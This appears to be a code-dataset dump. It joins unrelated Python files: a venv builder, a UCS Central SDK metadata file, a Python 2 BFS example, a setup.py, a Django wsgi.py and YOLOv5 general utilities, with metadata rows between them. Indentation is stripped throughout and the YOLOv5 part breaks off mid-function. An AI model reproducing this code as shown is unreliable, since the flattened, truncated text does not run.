import io
import logging
import os
import os.path
import shutil
import sys
import sysconfig
try:
import threading
except ImportError:
threading = None
logger = logging.getLogger(__name__)
class Context:
"""
Holds information about a current venv creation/upgrade request.
"""
pass
class EnvBuilder:
"""
This class exists to allow virtual environment creation to be
customised. The constructor parameters determine the builder's
behaviour when called upon to create a virtual environment.
By default, the builder makes the system (global) site-packages dir
available to the created environment.
By default, the creation process uses symlinks wherever possible.
:param system_site_packages: If True, the system (global) site-packages
dir is available to created environments.
:param clear: If True and the target directory exists, it is deleted.
Otherwise, if the target directory exists, an error is
raised.
:param symlinks: If True, attempt to symlink rather than copy files into
virtual environment.
:param upgrade: If True, upgrade an existing virtual environment.
"""
def __init__(self, system_site_packages=False, clear=False,
symlinks=False, upgrade=False):
self.system_site_packages = system_site_packages
self.clear = clear
self.symlinks = symlinks
self.upgrade = upgrade
def create(self, env_dir):
"""
Create a virtual environment in a directory.
:param env_dir: The target directory to create an environment in.
"""
env_dir = os.path.abspath(env_dir)
context = self.ensure_directories(env_dir)
self.create_configuration(context)
self.setup_python(context)
if not self.upgrade:
self.setup_scripts(context)
self.post_setup(context)
def ensure_directories(self, env_dir):
"""
Create the directories for the environment.
Returns a context object which holds paths in the environment,
for use by subsequent logic.
"""
def create_if_needed(d):
if not os.path.exists(d):
os.makedirs(d)
if os.path.exists(env_dir) and not (self.clear or self.upgrade):
raise ValueError('Directory exists: %s' % env_dir)
if os.path.exists(env_dir) and self.clear:
shutil.rmtree(env_dir)
context = Context()
context.env_dir = env_dir
context.env_name = os.path.split(env_dir)[1]
context.prompt = '(%s) ' % context.env_name
create_if_needed(env_dir)
env = os.environ
if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
executable = os.environ['__PYVENV_LAUNCHER__']
else:
executable = sys.executable
dirname, exename = os.path.split(os.path.abspath(executable))
context.executable = executable
context.python_dir = dirname
context.python_exe = exename
if sys.platform == 'win32':
binname = 'Scripts'
incpath = 'Include'
libpath = os.path.join(env_dir, 'Lib', 'site-packages')
else:
binname = 'bin'
incpath = 'include'
libpath = os.path.join(env_dir, 'lib', 'python%d.%d' % sys.version_info[:2], 'site-packages')
context.inc_path = path = os.path.join(env_dir, incpath)
create_if_needed(path)
create_if_needed(libpath)
context.bin_path = binpath = os.path.join(env_dir, binname)
context.bin_name = binname
context.env_exe = os.path.join(binpath, exename)
create_if_needed(binpath)
return context
def create_configuration(self, context):
"""
Create a configuration file indicating where the environment's Python
was copied from, and whether the system site-packages should be made
available in the environment.
:param context: The information for the environment creation request
being processed.
"""
context.cfg_path = path = os.path.join(context.env_dir, 'pyvenv.cfg')
with open(path, 'w', encoding='utf-8') as f:
f.write('home = %s\n' % context.python_dir)
if self.system_site_packages:
incl = 'true'
else:
incl = 'false'
f.write('include-system-site-packages = %s\n' % incl)
f.write('version = %d.%d.%d\n' % sys.version_info[:3])
if os.name == 'nt':
def include_binary(self, f):
if f.endswith(('.pyd', '.dll')):
result = True
else:
result = f.startswith('python') and f.endswith('.exe')
return result
def symlink_or_copy(self, src, dst):
"""
Try symlinking a file, and if that fails, fall back to copying.
"""
force_copy = not self.symlinks
if not force_copy:
try:
if not os.path.islink(dst): # can't link to itself!
os.symlink(src, dst)
except Exception: # may need to use a more specific exception
logger.warning('Unable to symlink %r to %r', src, dst)
force_copy = True
if force_copy:
shutil.copyfile(src, dst)
def setup_python(self, context):
"""
Set up a Python executable in the environment.
:param context: The information for the environment creation request
being processed.
"""
binpath = context.bin_path
exename = context.python_exe
path = context.env_exe
copier = self.symlink_or_copy
copier(context.executable, path)
dirname = context.python_dir
if os.name != 'nt':
if not os.path.islink(path):
os.chmod(path, 0o755)
for suffix in ('python', 'python3'):
path = os.path.join(binpath, suffix)
if not os.path.exists(path):
os.symlink(exename, path)
else:
subdir = 'DLLs'
include = self.include_binary
files = [f for f in os.listdir(dirname) if include(f)]
for f in files:
src = os.path.join(dirname, f)
dst = os.path.join(binpath, f)
if dst != context.env_exe: # already done, above
copier(src, dst)
dirname = os.path.join(dirname, subdir)
if os.path.isdir(dirname):
files = [f for f in os.listdir(dirname) if include(f)]
for f in files:
src = os.path.join(dirname, f)
dst = os.path.join(binpath, f)
copier(src, dst)
# copy init.tcl over
for root, dirs, files in os.walk(context.python_dir):
if 'init.tcl' in files:
tcldir = os.path.basename(root)
tcldir = os.path.join(context.env_dir, 'Lib', tcldir)
os.makedirs(tcldir)
src = os.path.join(root, 'init.tcl')
dst = os.path.join(tcldir, 'init.tcl')
shutil.copyfile(src, dst)
break
def setup_scripts(self, context):
"""
Set up scripts into the created environment from a directory.
This method installs the default scripts into the environment
being created. You can prevent the default installation by overriding
this method if you really need to, or if you need to specify
a different location for the scripts to install. By default, the
'scripts' directory in the venv package is used as the source of
scripts to install.
"""
path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(path, 'scripts')
self.install_scripts(context, path)
def post_setup(self, context):
"""
Hook for post-setup modification of the venv. Subclasses may install
additional packages or scripts here, add activation shell scripts, etc.
:param context: The information for the environment creation request
being processed.
"""
pass
def replace_variables(self, text, context):
"""
Replace variable placeholders in script text with context-specific
variables.
Return the text passed in , but with variables replaced.
:param text: The text in which to replace placeholder variables.
:param context: The information for the environment creation request
being processed.
"""
text = text.replace('__VENV_DIR__', context.env_dir)
text = text.replace('__VENV_NAME__', context.prompt)
text = text.replace('__VENV_BIN_NAME__', context.bin_name)
text = text.replace('__VENV_PYTHON__', context.env_exe)
return text
def install_scripts(self, context, path):
"""
Install scripts into the created environment from a directory.
:param context: The information for the environment creation request
being processed.
:param path: Absolute pathname of a directory containing script.
Scripts in the 'common' subdirectory of this directory,
and those in the directory named for the platform
being run on, are installed in the created environment.
Placeholder variables are replaced with environment-
specific values.
"""
binpath = context.bin_path
plen = len(path)
for root, dirs, files in os.walk(path):
if root == path: # at top-level, remove irrelevant dirs
for d in dirs[:]:
if d not in ('common', os.name):
dirs.remove(d)
continue # ignore files in top level
for f in files:
srcfile = os.path.join(root, f)
suffix = root[plen:].split(os.sep)[2:]
if not suffix:
dstdir = binpath
else:
dstdir = os.path.join(binpath, *suffix)
if not os.path.exists(dstdir):
os.makedirs(dstdir)
dstfile = os.path.join(dstdir, f)
with open(srcfile, 'rb') as f:
data = f.read()
if srcfile.endswith('.exe'):
mode = 'wb'
else:
mode = 'w'
data = data.decode('utf-8')
data = self.replace_variables(data, context)
with open(dstfile, mode) as f:
f.write(data)
shutil.copymode(srcfile, dstfile)
def create(env_dir, system_site_packages=False, clear=False, symlinks=False):
"""
Create a virtual environment in a directory.
By default, makes the system (global) site-packages dir available to
the created environment.
:param env_dir: The target directory to create an environment in.
:param system_site_packages: If True, the system (global) site-packages
dir is available to the environment.
:param clear: If True and the target directory exists, it is deleted.
Otherwise, if the target directory exists, an error is
raised.
:param symlinks: If True, attempt to symlink rather than copy files into
virtual environment.
"""
builder = EnvBuilder(system_site_packages=system_site_packages,
clear=clear, symlinks=symlinks)
builder.create(env_dir)
def main(args=None):
compatible = True
if sys.version_info < (3, 3):
compatible = False
elif not hasattr(sys, 'base_prefix'):
compatible = False
if not compatible:
raise ValueError('This script is only for use with Python 3.3')
else:
import argparse
parser = argparse.ArgumentParser(prog=__name__,
description='Creates virtual Python '
'environments in one or '
'more target '
'directories.',
epilog='Once an environment has been '
'created, you may wish to '
'activate it, e.g. by '
'sourcing an activate script '
'in its bin directory.')
parser.add_argument('dirs', metavar='ENV_DIR', nargs='+',
help='A directory to create the environment in.')
parser.add_argument('--system-site-packages', default=False,
action='store_true', dest='system_site',
help='Give the virtual environment access to the '
'system site-packages dir.')
if os.name == 'nt':
use_symlinks = False
else:
use_symlinks = True
parser.add_argument('--symlinks', default=use_symlinks,
action='store_true', dest='symlinks',
help='Try to use symlinks rather than copies, '
'when symlinks are not the default for '
'the platform.')
parser.add_argument('--clear', default=False, action='store_true',
dest='clear', help='Delete the environment '
'directory if it already '
'exists. If not specified and '
'the directory exists, an error'
' is raised.')
parser.add_argument('--upgrade', default=False, action='store_true',
dest='upgrade', help='Upgrade the environment '
'directory to use this version '
'of Python, assuming Python '
'has been upgraded in-place.')
options = parser.parse_args(args)
if options.upgrade and options.clear:
raise ValueError('you cannot supply --upgrade and --clear together.')
builder = EnvBuilder(system_site_packages=options.system_site,
clear=options.clear, symlinks=options.symlinks,
upgrade=options.upgrade)
for d in options.dirs:
builder.create(d)
if __name__ == '__main__':
rc = 1
try:
main()
rc = 0
except Exception as e:
print('Error: %s' % e, file=sys.stderr)
sys.exit(rc)
| 41.095238
| 105
| 0.554736
|
f1db7e2a3846ae5bb95517d709e5d0346e8f9f39
| 953
|
py
|
Python
|
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
"""This module contains the meta information of ConfigConfMoGroup ExternalMethod."""
from ..ucscentralcoremeta import MethodMeta, MethodPropertyMeta
method_meta = MethodMeta("ConfigConfMoGroup", "configConfMoGroup", "Version142b")
prop_meta = {
"cookie": MethodPropertyMeta("Cookie", "cookie", "Xs:string", "Version142b", "InputOutput", False),
"in_config": MethodPropertyMeta("InConfig", "inConfig", "ConfigConfig", "Version142b", "Input", True),
"in_dns": MethodPropertyMeta("InDns", "inDns", "DnSet", "Version142b", "Input", True),
"in_hierarchical": MethodPropertyMeta("InHierarchical", "inHierarchical", "Xs:string", "Version142b", "Input", False),
"out_configs": MethodPropertyMeta("OutConfigs", "outConfigs", "ConfigSet", "Version142b", "Output", True),
}
prop_map = {
"cookie": "cookie",
"inConfig": "in_config",
"inDns": "in_dns",
"inHierarchical": "in_hierarchical",
"outConfigs": "out_configs",
}
| 41.434783
| 122
| 0.705142
|
d3dbdfa79d765601c8746b92a508666e27db40ca
| 787
|
py
|
Python
|
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
from collections import deque
def person_is_seller(name):
return name[-1] == 'm'
def search(name):
graph = {}
graph["you"] = ["alice", "bob", "claire"]
graph["bob"] = ["anuj", "peggy"]
graph["alice"] = ["peggy"]
graph["claire"] = ["thom", "jonny"]
graph["anuj"] = []
graph["peggy"] = []
graph["thom"] = []
graph["jonny"] = []
search_queue = deque()
search_queue += graph[name]
searched = []
while search_queue:
person = search_queue.popleft()
if not person in searched:
if person_is_seller(person):
print person + " is a mango seller!"
return True
else:
search_queue += graph[person]
searched.append(person)
return False
| 27.137931
| 52
| 0.52986
|
ded315fc3018ed28ee637cff3af744b1de9c542f
| 134
|
py
|
Python
|
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | 3
|
2020-03-12T09:21:24.000Z
|
2021-12-27T14:06:20.000Z
|
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | null | null | null |
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | null | null | null |
import setuptools
setuptools.setup(name = 'kdlutils', packages = ['dlutils/kdlutils'],version = '0.1', author = 'Kaustubh sadekar')
| 26.8
| 113
| 0.716418
|
f6a78aa3b721814a9683d58f4c57d377d074323b
| 405
|
py
|
Python
|
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
"""
WSGI config for TTSHLINENotify project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TTSHLINENotify.settings')
application = get_wsgi_application()
| 23.823529
| 78
| 0.792593
|
e1c14bdaa4b3bd5f4edb85637be60b42dce32b9a
| 23,894
|
py
|
Python
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 23
|
2021-01-19T11:55:53.000Z
|
2021-07-22T05:30:57.000Z
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 122
|
2021-03-06T15:46:08.000Z
|
2021-06-09T10:36:11.000Z
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 40
|
2021-01-20T13:12:52.000Z
|
2021-05-29T18:26:43.000Z
|
# General utils
import glob
import logging
import math
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import torch
import torchvision
import yaml
from utils.google_utils import gsutil_getsize
from utils.metrics import fitness
from utils.torch_utils import init_torch_seeds
# Settings
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads
def set_logging(rank=-1):
logging.basicConfig(
format="%(message)s",
level=logging.INFO if rank in [-1, 0] else logging.WARN)
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds
random.seed(seed)
np.random.seed(seed)
init_torch_seeds(seed)
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def check_online():
# Check internet connectivity
import socket
try:
socket.create_connection(("1.1.1.1", 443), 5) # check host accesability
return True
except OSError:
return False
def check_git_status():
# Recommend 'git pull' if code is out of date
print(colorstr('github: '), end='')
try:
assert Path('.git').exists(), 'skipping check (not a git repository)'
assert not isdocker(), 'skipping check (Docker image)'
assert check_online(), 'skipping check (offline)'
cmd = 'git fetch && git config --get remote.origin.url'
url = subprocess.check_output(cmd, shell=True).decode().strip().rstrip('.git') # github repo url
branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \
f"Use 'git pull' to update or 'git clone {url}' to download latest."
else:
s = f'up to date with {url} ✅'
print(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s)
except Exception as e:
print(e)
def check_requirements(file='requirements.txt', exclude=()):
# Check installed dependencies meet requirements
import pkg_resources
requirements = [f'{x.name}{x.specifier}' for x in pkg_resources.parse_requirements(Path(file).open())
if x.name not in exclude]
pkg_resources.require(requirements) # DistributionNotFound or VersionConflict exception if requirements not met
def check_img_size(img_size, s=32):
# Verify img_size is a multiple of stride s
new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
if new_size != img_size:
print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
return new_size
def check_imshow():
# Check if environment supports image displays
try:
assert not isdocker(), 'cv2.imshow() is disabled in Docker environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
print(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_file(file):
# Search for file if not found
if os.path.isfile(file) or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True) # find file
assert len(files), 'File Not Found: %s' % file # assert file was found
assert len(files) == 1, "Multiple files match '%s', specify exact path: %s" % (file, files) # assert unique
return files[0] # return file
def check_dataset(dict):
# Download dataset if not found locally
val, s = dict.get('val'), dict.get('download')
if val and len(val):
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()])
if s and len(s): # download script
print('Downloading %s ...' % s)
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
torch.hub.download_url_to_file(s, f)
r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip
else: # bash script
r = os.system(s)
print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value
else:
raise Exception('Dataset not found.')
def make_divisible(x, divisor):
# Returns x evenly divisible by divisor
return math.ceil(x / divisor) * divisor
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
x, y, = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # cls, xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, img_shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
iou = inter / union
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +
(b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + eps # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=()):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
